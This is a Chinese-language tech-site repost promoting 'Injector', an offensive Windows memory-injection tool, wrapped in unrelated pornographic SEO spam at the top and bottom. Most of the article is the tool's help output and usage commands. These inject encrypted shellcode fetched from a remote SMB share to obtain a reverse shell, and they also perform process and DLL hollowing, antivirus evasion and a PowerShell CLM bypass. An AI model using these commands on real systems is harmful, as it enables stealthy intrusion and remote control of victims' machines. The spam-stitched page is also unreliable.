成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

如何使用Injector實現Windows下的內存注入

安全 網站安全
Injector是一款功能齊全且強大的內存注入工具,該工具集成了多種技術,可以幫助紅隊研究人員實現在Windows系統下的內存注入。

[[423411]]

關于Injector

Injector是一款功能齊全且強大的內存注入工具,該工具集成了多種技術,可以幫助紅隊研究人員實現在Windows系統下的內存注入。

Injector能做什么?

針對遠程服務器和本地存儲提供Shellcode注入支持。只需指定Shellcode文件,該工具將幫助我們完成后續的所有事情。默認情況下,工具會將Shellcode注入至exe,如果沒有找到目標進程,它將會創建一個記事本進程,并注入其中實現持久化感染。

  • 支持反射DLL注入,工具將下載DLL并注入遠程進程。
  • 通過exe實現進程鏤空。
  • 使用-bypass參數,以支持使用更高級的、未記錄的API來進行進程注入。
  • 支持加密的Shellcode,比如說AES加密或異或加密等。
  • 支持針對PowerShell的CLM繞過,可以直接將代碼存防止能夠執行C#代碼的白名單文件夾中,比如說“C:\Windows\Tasks”。
  • 支持DLL鏤空,通過dll實現。

工具下載

廣大研究人員可以使用下列命令將該項目源碼克隆至本地:

  1. git clone https://github.com/0xDivyanshu/Injector.git 

工具幫助

  1. C:\Users\admin>Injector.exe 
  2.  
  3. Help Options for Xenon: 
  4.  
  5. -m       Mode of operation 
  6.  
  7.         -m 1     Specifies the mode as Process injection 
  8.  
  9.         -m 2     Specifies the mode as Reflective DLL Injection 
  10.  
  11.         -m 3     Specifies the mode as Process Hollowing 
  12.  
  13.         -m 4     No injection! Give me my damn shell 
  14.  
  15.         -m 5     Powershell session via CLM bypass 
  16.  
  17.         -m 6     DLL hollowing 
  18.  
  19.   
  20.  
  21. -TempFile        File location that your current user can read 
  22.  
  23. -shellcode       Use shellcode 
  24.  
  25. -dll     Use dll 
  26.  
  27. -decrypt-xor     Specify Xor decryption for shellcode 
  28.  
  29.          -pass   Specifty the password for Xor decryption 
  30.  
  31. -decrypt-aes     Specify aes decryption for shellcode 
  32.  
  33.          -pass   Specifty the password for aes decryption 
  34.  
  35. -location        Specify the location i.e either server or local 
  36.  
  37. -bypass         Uses enhance attempts to bypass AV 

如需生成加密的Shellcode,請在Kali下使用Helper.exe。

工具使用樣例

  1. Injector.exe -m=1 -shellcode -encrypt-aes -pass=password -location="\\192.x.x.x\share\shellcode.txt" -bypass 

上述命令將解密你的Shellcode并給你一個反向Shell。

如果你不想使用加密的Shellcode,你也可以直接使用下列命令運行下列命令:

  1. Injector.exe -m=1 -shellcode -location="\\192.x.x.x\share\shellcode.txt" 

將其中的“-m=1”修改為“2,3,4,6”之后,就可以運行其他模式了:

  1. Injector.exe -m=5 -TempFile=C:\\Users\\user\\sample.txt 

上述命令將提供要給會話,我們可以使用它來執行IEX cradle,并獲取一個能夠繞過CLM的反向Shell。

PowerShell

你還可以使用Invoke-Exe.ps1來通過PowerShel執行Injector:

  1. Invoke-Exe -loc C:\Users\john\injector.exe 

項目地址

Injector:【GitHub傳送門

 

責任編輯:趙寧寧 來源: FreeBuf
相關推薦

2021-09-13 18:09:35

cThreadHija遠程進程注入網絡攻擊

2010-04-08 15:37:33

2021-07-28 09:53:53

FalconEye注入安全檢測

2025-04-01 00:33:03

LangGraphPython內存

2017-08-16 16:00:05

PHPcontainer依賴注入

2014-03-04 09:53:29

Redis存儲系統

2010-06-04 14:12:57

Hadoop開發環境

2009-09-09 13:47:38

C++訪問SqlCe

2020-11-25 08:41:56

Windows

2010-09-27 15:03:34

TomcatJVM內存設置

2009-04-11 15:12:24

Windows CE串行通信GPS

2017-04-13 13:00:27

LinuxWindowstomcat

2010-05-26 15:07:36

SVN版本庫自動備份

2018-07-24 09:57:02

2011-09-05 14:17:07

UbuntuWindows鍵

2022-09-01 13:12:53

LinuxTC網絡限流

2010-06-07 09:47:34

php sendmai

2012-09-28 13:39:40

Windows備份

2011-08-08 16:49:07

自動關機SwitchOffWindows

2018-12-07 11:15:20

設置Windows 10命令
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 亚洲国产专区 | 99riav国产一区二区三区 | 性高湖久久久久久久久 | 国产免费视频 | 在线观看免费av网 | 国产精品777一区二区 | 日韩精品久久久久 | 女人牲交视频一级毛片 | 国产精品国产精品 | 久久久精品一区二区三区 | 国产精品国产精品国产专区不蜜 | 久久小视频 | 精品国产亚洲一区二区三区大结局 | 成人小视频在线观看 | 久久久人成影片一区二区三区 | 国产亚洲欧美在线视频 | 久久久91精品国产一区二区精品 | 国产午夜精品理论片a大结局 | 亚洲乱码国产乱码精品精的特点 | 色香婷婷| 亚洲欧美第一视频 | 日韩在线小视频 | 激情国产 | 久久精品国产一区二区电影 | 国内精品视频 | 成人亚洲性情网站www在线观看 | 成人av免费播放 | 国产精品污www在线观看 | 性高湖久久久久久久久3小时 | 欧美极品在线视频 | 国产98色在线 | 极品国产视频 | 在线免费黄色小视频 | 国产一区二区观看 | 久久久精品一区二区三区 | 高清黄色网址 | 亚洲视频免费在线观看 | 午夜免费电影 | 人干人人| 亚洲vs天堂| 国产日韩精品一区 |